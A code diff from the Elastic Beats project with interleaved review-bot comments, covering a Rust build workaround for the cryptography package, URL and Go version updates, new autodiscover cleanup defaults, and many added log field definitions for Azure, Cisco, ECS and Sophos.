72940c0591e..9439e15e93d 100644 --- a/dev-tools/common.bash +++ b/dev-tools/common.bash @@ -91,6 +91,10 @@ jenkins_setup() { # Workaround for Python virtualenv path being too long. export TEMP_PYTHON_ENV=$(mktemp -d) + + # Workaround for cryptography package (pip dependency) relying on rust + export CRYPTOGRAPHY_DONT_BUILD_RUST=1 + export PYTHON_ENV="${TEMP_PYTHON_ENV}/python-env" # Write cached magefile binaries to workspace to ensure diff --git a/dev-tools/mage/pytest.go b/dev-tools/mage/pytest.go index e562fdef95b..f933300f935 100644 --- a/dev-tools/mage/pytest.go 
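Review bot: `export CRYPTOGRAPHY_DONT_BUILD_RUST=1` in `jenkins_setup` of dev-tools/common.bash (and the matching `os.Setenv` in dev-tools/mage/pytest.go) is not tied to any cryptography version. As far as I know the variable was a temporary opt-out in the cryptography 3.4 series and later releases do not honour it, so an unpinned install could start failing again or build differently without notice; confirm against the upstream changelog. Pinning the package in the requirements file, or upgrading pip first so a prebuilt wheel is selected, would make the build reproducible. At minimum the comment could state the limit, e.g. `# Temporary: believed to be honoured only by cryptography 3.4.x; remove once the package is pinned or wheels are used`.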
+++ b/dev-tools/mage/pytest.go @@ -192,6 +192,12 @@ func PythonVirtualenv() (string, error) { pythonVirtualenvLock.Lock() defer pythonVirtualenvLock.Unlock() + // When upgrading pip we might run into an error with the cryptography package + // (pip dependency) will not compile if no recent rust development environment is available. + // We set `CRYPTOGRAPHY_DONT_BUILD_RUST=1`, to disable the need for python. + // See: https://github.com/pyca/cryptography/issues/5771 + os.Setenv("CRYPTOGRAPHY_DONT_BUILD_RUST", "1") + // Determine the location of the virtualenv. ve, err := pythonVirtualenvPath() if err != nil { diff --git a/dev-tools/mage/settings.go b/dev-tools/mage/settings.go index 9640af73e27..5134a24e22d 100644 --- a/dev-tools/mage/settings.go +++ b/dev-tools/mage/settings.go @@ -73,7 +73,7 @@ var ( BeatDescription = EnvOr("BEAT_DESCRIPTION", "") BeatVendor = EnvOr("BEAT_VENDOR", "Elastic") BeatLicense = EnvOr("BEAT_LICENSE", "ASL 2.0") - BeatURL = EnvOr("BEAT_URL", "https://www.elastic.co/products/beats/"+BeatName) + BeatURL = EnvOr("BEAT_URL", "https://www.elastic.co/beats/"+BeatName) BeatUser = EnvOr("BEAT_USER", "root") BeatProjectType ProjectType diff --git a/dev-tools/packaging/templates/deb/elastic-agent.init.sh.tmpl b/dev-tools/packaging/templates/deb/elastic-agent.init.sh.tmpl index 4ee5f6c2e5a..812bc978199 100644 --- a/dev-tools/packaging/templates/deb/elastic-agent.init.sh.tmpl +++ b/dev-tools/packaging/templates/deb/elastic-agent.init.sh.tmpl @@ -7,7 +7,7 @@ # Default-Stop: 0 1 6 # Short-Description: {{.Description}} # Description: {{.BeatName | title}} is a shipper part of the Elastic Beats -# family. Please see: https://www.elastic.co/products/beats +# family. Please see: https://www.elastic.co/beats ### END INIT INFO # Do NOT "set -e" diff --git a/dev-tools/packaging/templates/deb/init.sh.tmpl b/dev-tools/packaging/templates/deb/init.sh.tmpl index 90d026dd0ba..b30e29d40a1 100644 --- a/dev-tools/packaging/templates/deb/init.sh.tmpl 
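Review bot: The new comment in `PythonVirtualenv` says the variable is set "to disable the need for python", which should read Rust, and its first sentence is hard to parse. Suggested wording: `// Upgrading pip may build the cryptography package (a pip dependency) from source, which fails without a recent Rust toolchain.` followed by `// CRYPTOGRAPHY_DONT_BUILD_RUST=1 disables the Rust build.` The return value of `os.Setenv` is also dropped; since the function already returns `(string, error)`, `if err := os.Setenv("CRYPTOGRAPHY_DONT_BUILD_RUST", "1"); err != nil { return "", err }` keeps a failure visible. The function body continues outside the hunk.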
+++ b/dev-tools/packaging/templates/deb/init.sh.tmpl @@ -7,7 +7,7 @@ # Default-Stop: 0 1 6 # Short-Description: {{.Description}} # Description: {{.BeatName | title}} is a shipper part of the Elastic Beats -# family. Please see: https://www.elastic.co/products/beats +# family. Please see: https://www.elastic.co/beats ### END INIT INFO # Do NOT "set -e" diff --git a/dev-tools/packaging/templates/rpm/elastic-agent.init.sh.tmpl b/dev-tools/packaging/templates/rpm/elastic-agent.init.sh.tmpl index eb5a96e878d..573f0c9496b 100644 --- a/dev-tools/packaging/templates/rpm/elastic-agent.init.sh.tmpl +++ b/dev-tools/packaging/templates/rpm/elastic-agent.init.sh.tmpl @@ -14,7 +14,7 @@ # Default-Stop: 0 1 6 # Short-Description: {{.Description}} # Description: {{.BeatName | title}} is a shipper part of the Elastic Beats -# family. Please see: https://www.elastic.co/products/beats +# family. Please see: https://www.elastic.co/beats ### END INIT INFO diff --git a/dev-tools/packaging/templates/rpm/init.sh.tmpl b/dev-tools/packaging/templates/rpm/init.sh.tmpl index bfdf44fff9c..1bd3a846705 100644 --- a/dev-tools/packaging/templates/rpm/init.sh.tmpl +++ b/dev-tools/packaging/templates/rpm/init.sh.tmpl @@ -14,7 +14,7 @@ # Default-Stop: 0 1 6 # Short-Description: {{.Description}} # Description: {{.BeatName | title}} is a shipper part of the Elastic Beats -# family. Please see: https://www.elastic.co/products/beats +# family. Please see: https://www.elastic.co/beats ### END INIT INFO diff --git a/docs/devguide/newbeat.asciidoc b/docs/devguide/newbeat.asciidoc index a7f239f22fc..56677b5d619 100644 --- a/docs/devguide/newbeat.asciidoc +++ b/docs/devguide/newbeat.asciidoc 
@@ -138,7 +138,7 @@ For the `github_name`, enter your github id. The `beat` and `beat_path` are set --------- Enter a project name [examplebeat]: Countbeat Enter a github name [your-github-name]: {username} -Enter a beat path [github.com/{username}/countbeat]: +Enter a beat path [github.com/{username}/countbeat]: Enter a full name [Firstname Lastname]: {Full Name} Enter the github.com/elastic/beats revision [master]: --------- @@ -162,7 +162,7 @@ To fetch dependencies and set up the Beat, run: [source,shell] --------- cd ${GOPATH}/src/github.com/{user}/countbeat -make setup +make update --------- The Beat now contains the basic config file, `countbeat.yml`, and template files. The Beat is "complete" in the sense @@ -340,7 +340,7 @@ countbeat: - `period`: Defines how often to send out events -The config file is generated when you run `make setup` to <>. The file contains +The config file is generated when you run `make update` to <>. The file contains basic configuration information. To add configuration options to your Beat, you need to update the Go structures in `config/config.go` and add the corresponding config options to `_meta/beat.yml`. diff --git a/filebeat/Dockerfile b/filebeat/Dockerfile index 27c59548eb2..1e8fd395a95 100644 --- a/filebeat/Dockerfile +++ b/filebeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/filebeat/README.md b/filebeat/README.md index b47e54f4138..893d35e5e21 100644 --- a/filebeat/README.md +++ b/filebeat/README.md @@ -3,7 +3,7 @@ Filebeat is an open source file harvester, mostly used to fetch logs files and feed them into logstash. Together with the libbeat lumberjack output is a replacement for [logstash-forwarder](https://github.com/elastic/logstash-forwarder). -To learn more about Filebeat, check out https://www.elastic.co/products/beats/filebeat. +To learn more about Filebeat, check out https://www.elastic.co/beats/filebeat. ## Quick start 
diff --git a/filebeat/autodiscover/defaults.go b/filebeat/autodiscover/defaults.go new file mode 100644 index 00000000000..701241ba625 --- /dev/null +++ b/filebeat/autodiscover/defaults.go @@ -0,0 +1,30 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package autodiscover + +import ( + "time" + + "github.com/elastic/beats/v7/libbeat/autodiscover/providers/docker" + "github.com/elastic/beats/v7/libbeat/autodiscover/providers/kubernetes" +) + +func init() { + docker.DefaultCleanupTimeout = 60 * time.Second + kubernetes.DefaultCleanupTimeout = 60 * time.Second +} diff --git a/filebeat/autodiscover/imports.go b/filebeat/autodiscover/imports.go new file mode 100644 index 00000000000..561c2395ac4 --- /dev/null +++ b/filebeat/autodiscover/imports.go 
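Review bot: The `init` in filebeat/autodiscover/defaults.go overwrites package-level defaults in the libbeat docker and kubernetes providers, with no comment saying why Filebeat needs 60 seconds or what the libbeat default is. Because it runs as an import side effect, the value in effect depends on whether this package is linked in, which is hard to discover from the provider code. A comment would help, e.g. `// Filebeat keeps autodiscover configs for 60s after a container stops (presumably so remaining log lines are still read; confirm).` If any other package assigns the same variables from its own `init`, the final value depends on initialisation order; confirm none does.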
@@ -0,0 +1,22 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package autodiscover + +import ( + _ "github.com/elastic/beats/v7/filebeat/autodiscover/builder/hints" +) diff --git a/filebeat/beater/filebeat.go b/filebeat/beater/filebeat.go index 837fc341a79..41b15b1543c 100644 --- a/filebeat/beater/filebeat.go +++ b/filebeat/beater/filebeat.go @@ -54,8 +54,8 @@ import ( _ "github.com/elastic/beats/v7/filebeat/processor/add_kubernetes_metadata" _ "github.com/elastic/beats/v7/libbeat/processors/decode_csv_fields" - // include all filebeat specific builders - _ "github.com/elastic/beats/v7/filebeat/autodiscover/builder/hints" + // include all filebeat specific autodiscover features + _ "github.com/elastic/beats/v7/filebeat/autodiscover" ) const pipelinesWarning = "Filebeat is unable to load the Ingest Node pipelines for the configured" + diff --git a/filebeat/docs/configuring-howto.asciidoc b/filebeat/docs/configuring-howto.asciidoc index 4a2799c87aa..8bd08a838ef 100644 --- a/filebeat/docs/configuring-howto.asciidoc +++ b/filebeat/docs/configuring-howto.asciidoc 
@@ -60,7 +60,6 @@ include::./filebeat-filtering.asciidoc[] :autodiscoverHints: :autodiscoverNomad: include::{libbeat-dir}/shared-autodiscover.asciidoc[] -:autodiscoverNomad!: include::{libbeat-dir}/queueconfig.asciidoc[] diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index 3ab9d5718fe..e59ddb41c00 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc 
@@ -3569,6 +3569,124 @@ type: keyword Status +type: keyword + +-- + +*`azure.signinlogs.properties.authentication_requirement_policies`*:: ++ +-- +Set of CA policies that apply to this sign-in, each as CA: policy name, and/or MFA: Per-user. + + +type: keyword + +-- + +*`azure.signinlogs.properties.applied_conditional_access_policies`*:: ++ +-- +Details of the conditional access policies being applied for the sign-in. + + +type: nested + +-- + +*`azure.signinlogs.properties.resource_tenant_id`*:: ++ +-- +The resource tenantId for B2B(business-to-business) scenarios. + + +type: keyword + +-- + +*`azure.signinlogs.properties.authentication_details`*:: ++ +-- +A record of each step of authentication undertaken in the sign-in. + + +type: nested + +-- + +*`azure.signinlogs.properties.authentication_processing_details`*:: ++ +-- +Provides the details associated with authentication processor. + + +type: flattened + +-- + +*`azure.signinlogs.properties.flagged_for_review`*:: ++ +-- +Event was flagged for review. + +type: boolean + +-- + +*`azure.signinlogs.properties.network_location_details`*:: ++ +-- +Provides the details associated with authentication processor. + + +type: keyword + +-- + +*`azure.signinlogs.properties.risk_event_types`*:: ++ +-- +The list of risk event types associated with the sign-in. + + +type: keyword + +-- + +*`azure.signinlogs.properties.risk_event_types_v2`*:: ++ +-- +The list of risk event types associated with the sign-in. + + +type: keyword + +-- + +*`azure.signinlogs.properties.authentication_requirement`*:: ++ +-- +Type of authentication required for the sign-in. If set to multiFactorAuthentication, an MFA step was required. If set to singleFactorAuthentication, no MFA was required + + +type: keyword + +-- + +*`azure.signinlogs.properties.resource_id`*:: ++ +-- +ID of the resource that the user signed into. + + +type: keyword + +-- + +*`azure.signinlogs.properties.user_type`*:: ++ +-- +User type. + type: keyword -- 
@@ -9072,6 +9190,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-bluecoat]] == Blue Coat Director fields @@ -21080,7 +21207,7 @@ type: keyword -- -*`cisco.amp.file.archived_file.identify.sha256`*:: +*`cisco.amp.file.archived_file.identity.sha256`*:: + -- SHA256 hash of the archived file related to the malicious event. @@ -21290,12 +21417,52 @@ type: flattened -- +*`cisco.amp.mitre_tactics`*:: ++ +-- +Array of all related mitre tactic ID's + + +type: keyword + +-- + *`cisco.amp.techniques`*:: + -- List of all MITRE techniques related to the incident found. +type: flattened + +-- + +*`cisco.amp.mitre_techniques`*:: ++ +-- +Array of all related mitre technique ID's + + +type: keyword + +-- + +*`cisco.amp.command_line.arguments`*:: ++ +-- +The CLI arguments related to the Cloud Threat IOC reported by Cisco. + + +type: keyword + +-- + +*`cisco.amp.bp_data`*:: ++ +-- +Endpoint isolation information + + type: flattened -- @@ -21615,6 +21782,26 @@ type: keyword The total count of burst rate hits since the object was created or cleared +type: keyword + +-- + +*`cisco.asa.termination_user`*:: ++ +-- +AAA name of user requesting termination + + +type: keyword + +-- + +*`cisco.asa.webvpn.group_name`*:: ++ +-- +The WebVPN group name the user belongs to + + type: keyword -- @@ -21833,6 +22020,26 @@ type: keyword The assigned DAP records +type: keyword + +-- + +*`cisco.ftd.termination_user`*:: ++ +-- +AAA name of user requesting termination + + +type: keyword + +-- + +*`cisco.ftd.webvpn.group_name`*:: ++ +-- +The WebVPN group name the user belongs to + + type: keyword -- @@ -39719,6 +39926,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- 
@@ -39776,6 +39994,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -39798,6 +40028,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- @@ -39811,9 +40052,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -40128,6 +40372,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -40145,6 +40401,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -40168,6 +40436,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- 
@@ -40334,6 +40614,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -40391,6 +40682,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- @@ -40413,6 +40716,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -40426,9 +40740,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -40647,6 +40964,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -40670,6 +40999,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -40730,6 +41071,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- 
@@ -41475,6 +41825,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- @@ -41498,6 +41860,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -41646,6 +42020,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -42136,6 +42519,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -42193,6 +42587,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -42215,6 +42621,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group 
@@ -42252,8 +42669,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -42292,6 +42710,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host @@ -42310,6 +42737,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -42333,6 +42789,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- 
@@ -42390,6 +42857,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -42412,6 +42891,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -42445,10 +42935,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: @@ -42461,6 +42954,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- 
@@ -42738,6 +43267,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -43271,7 +43812,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -43335,7 +43876,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -43354,6 +43895,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -43411,6 +43963,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- 
@@ -43433,6 +43997,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -43445,7 +44020,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -43509,7 +44084,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -43529,10 +44104,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: 
@@ -44102,6 +44680,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -44125,6 +44715,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -44247,6 +44849,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- @@ -44301,6 +44912,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -44324,6 +44947,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -44446,6 +45081,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -45184,6 +45828,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- 
@@ -45241,6 +45896,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -45263,6 +45930,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- @@ -45276,9 +45954,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -45646,6 +46327,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -45703,6 +46395,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -45725,6 +46429,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- 
@@ -45738,9 +46453,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: @@ -66068,7 +66786,7 @@ type: keyword SAML status code. -type: long +type: keyword -- @@ -66078,7 +66796,7 @@ type: long SAML second level status code. -type: long +type: keyword -- @@ -67332,7 +68050,7 @@ type: keyword SAML status code. -type: long +type: keyword -- @@ -67342,7 +68060,7 @@ type: long SAML second level status code. -type: long +type: keyword -- @@ -111540,7 +112258,7 @@ type: keyword The list of targets. -type: array +type: flattened -- @@ -112385,6 +113103,16 @@ Specifies the sub type of the log -- +*`panw.panos.virtual_sys`*:: ++ +-- +Virtual system instance + + +type: keyword + +-- + [[exported-fields-pensando]] == Pensando fields @@ -140689,13 +141417,7 @@ type: keyword -- [float] -=== sophos - - - - -[float] -=== xg +=== sophos.xg Module for parsing sophosxg syslog. @@ -141491,7 +142213,7 @@ type: keyword -- -*`sophos.xg.FTP_url`*:: +*`sophos.xg.ftp_url`*:: + -- FTP URL from which virus was downloaded @@ -141501,7 +142223,7 @@ type: keyword -- -*`sophos.xg.FTP_direction`*:: +*`sophos.xg.ftp_direction`*:: + -- Direction of FTP transfer: Upload or Download @@ -142557,6 +143279,26 @@ type: keyword clients connection ssid +type: keyword + +-- + +*`sophos.xg.sqli`*:: ++ +-- +The related SQLI caught by the WAF + + +type: keyword + +-- + +*`sophos.xg.xss`*:: ++ +-- +The related XSS caught by the WAF + + type: keyword -- 
